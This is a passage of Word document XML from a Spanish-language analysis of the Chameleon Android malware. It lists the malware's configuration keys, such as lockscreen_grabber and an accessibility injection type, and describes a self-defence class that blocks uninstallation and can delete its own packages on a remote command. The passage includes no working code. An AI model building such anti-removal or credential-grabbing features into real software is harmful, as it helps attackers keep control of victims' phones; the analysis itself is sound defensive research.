              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>is_chameleon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A464146" w14:textId="439F0A9F" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3C90" w14:paraId="6F88817E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41530F23" w14:textId="29008BD1" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Interval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A7898BE" w14:textId="747F16F5" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>2000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3C90" w14:paraId="6BA74A61" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A209C98" w14:textId="484E8571" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>play_protect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60244CE8" w14:textId="6E57C244" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3C90" w14:paraId="6A352D0B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3913B8AF" w14:textId="45AD94F5" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>lockscreen_grabber</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44A0DC6D" w14:textId="55188373" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3C90" w14:paraId="27C268BB" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="421FE96F" w14:textId="2E1C1B63" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>connect_server_a11y_granted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D4B2B21" w14:textId="05F76026" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3C90" w14:paraId="3F03698A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="700F00C1" w14:textId="5153C365" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>self_notification_hide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A9CDE28" w14:textId="4AA44351" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3C90" w14:paraId="1E773A61" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="201BCD1B" w14:textId="75497D5E" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65984AB7" w14:textId="76AE39F7" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Google Play</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3C90" w14:paraId="167A9B09" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B52AB69" w14:textId="6EADC7E4" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>subtext</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D86C684" w14:textId="384BCD75" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>(sin valor)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3C90" w14:paraId="703DC5D3" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C13C9F2" w14:textId="0544AD23" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>injection_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E370815" w14:textId="259BCFD6" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>a11y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3C90" w14:paraId="4740AA06" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78F0BF79" w14:textId="7EFEE98B" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>is</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46EE83BC" w14:textId="3DC30D0D" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3C90" w14:paraId="774C30D4" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1393C440" w14:textId="36A67FD7" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>work_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26DC94FB" w14:textId="04D1D7FF" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3C90" w14:paraId="339EFD90" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D5C2827" w14:textId="7AD8B2E5" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>self_defense_shutdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="437D291C" w14:textId="3A620B2F" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08192CE0" w14:textId="77777777" w:rsidR="004D5645" w:rsidRDefault="004D5645" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05525FB6" w14:textId="76EADBA4" w:rsidR="00366A89" w:rsidRDefault="00B659E0" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En este caso se ven las primeras menciones a la familia Chameleon de malware, así como valores que </w:t>
      </w:r>
      <w:r w:rsidR="00970009">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>parecerían</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00970009">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>hacer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> referencia a funciones como la capacidad de recopilar los datos de desbloqueo (</w:t>
      </w:r>
      <w:r w:rsidRPr="002001F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lockscreen_grabber</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">), si se trata de la primera ejecución del </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>malware</w:t>
      </w:r>
      <w:r w:rsidR="007C1A50">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el dispositivo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="002001F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>first_launch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">) o si el mecanismo de autodefensa </w:t>
      </w:r>
      <w:r w:rsidR="005E3B86">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se encuentra activado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="002001F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>self_defense_shutdown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4543B257" w14:textId="77777777" w:rsidR="00366A89" w:rsidRDefault="00366A89" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5009A638" w14:textId="6AE28382" w:rsidR="0021525F" w:rsidRDefault="00972A68" w:rsidP="0031204F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para efectuar las operaciones de funcionalidad de autodefensa</w:t>
      </w:r>
      <w:r w:rsidR="00310F9F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> adicional, el malware cuenta con una clase dedicada al modo de defensa del malware en el caso de que el comando remoto para la acción sea recibido, </w:t>
      </w:r>
      <w:r w:rsidR="00310F9F" w:rsidRPr="004E47CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SelfDefenseManager</w:t>
      </w:r>
      <w:r w:rsidR="000455C5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que entre otras capacidades puede </w:t>
      </w:r>
      <w:r w:rsidR="00547366">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">prevenir que el usuario pueda desinstalar la aplicación de manera autónoma, utilizando las acciones de botones del sistema para salir de la pantalla de ajustes en la que se lleva a cabo la desinstalación de aplicaciones o en caso de recibir el comando adecuado del servidor remoto, </w:t>
      </w:r>
      <w:r w:rsidR="000455C5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">desencadenar </w:t>
      </w:r>
      <w:r w:rsidR="00A62B76">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">como medida final </w:t>
      </w:r>
      <w:r w:rsidR="000455C5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>un borrado de los paquetes del malware</w:t>
      </w:r>
      <w:r w:rsidR="004A00E3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> como medida defensiva</w:t>
      </w:r>
      <w:r w:rsidR="00D237C6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAEAD2F" w14:textId="13D4EF06" w:rsidR="00310F9F" w:rsidRPr="0031204F" w:rsidRDefault="0021525F" w:rsidP="0031204F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En lo relativo a los comandos mencionados a lo largo de esta fase de análisis, se h</w:t>
      </w:r>
      <w:r w:rsidR="002B61A7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a analizado el código que se ha podido ofuscar y se ha tratado de obtener un listado de comandos existentes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, así como con las acciones que es factible que desencadenen por parte del malware</w:t>
      </w:r>
      <w:r w:rsidR="002B61A7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. La tabla completa con el listado se encuentra disponible en el Anexo C [X].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C32BAB" w14:textId="70CB8ACA" w:rsidR="00E95A92" w:rsidRDefault="00310F9F" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Por último, el servicio de informe de fallos mencionado previamente, ACRA, cuenta con una serie de clases asociadas</w:t>
      </w:r>
      <w:bookmarkStart w:id="70" w:name="_4.2__"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r w:rsidR="005E30EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para gestionar detalles que se incluyen en los informes a enviar</w:t>
      </w:r>
      <w:r w:rsidR="0003599A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005E30EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> como </w:t>
      </w:r>
      <w:r w:rsidR="0003599A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">por ejemplo </w:t>
      </w:r>
      <w:r w:rsidR="005E30EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">el formato </w:t>
      </w:r>
      <w:r w:rsidR="0003599A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">que deben tener estos documentos </w:t>
      </w:r>
      <w:r w:rsidR="005E30EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o qué tipo de datos se agregan</w:t>
      </w:r>
      <w:r w:rsidR="0003599A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para su registro</w:t>
      </w:r>
      <w:r w:rsidR="005E30EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0E572A" w14:textId="35FCBDB8" w:rsidR="00581588" w:rsidRPr="004E47CC" w:rsidRDefault="00581588" w:rsidP="00581588">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ACRAReportingManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6E903" w14:textId="064EDDA5" w:rsidR="00214F52" w:rsidRPr="004E47CC" w:rsidRDefault="00214F52"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ReportingService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D7062" w14:textId="20D669D1" w:rsidR="00731B05" w:rsidRPr="004E47CC" w:rsidRDefault="00731B05" w:rsidP="00214F52">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ReportFormat</w:t>
      </w:r>
      <w:r w:rsidR="00C119C5" w:rsidRPr="004E47CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Specifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287E051E" w14:textId="665EF754" w:rsidR="00310F9F" w:rsidRPr="00B93A0A" w:rsidRDefault="00214F52" w:rsidP="00310F9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E47CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>AcraReportFieldsEnum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3824E013" w14:textId="77777777" w:rsidR="00310F9F" w:rsidRDefault="00310F9F" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CF159F" w14:textId="1AEC9C75" w:rsidR="00EF394A" w:rsidRDefault="00EF394A" w:rsidP="00EF394A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc170500175"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
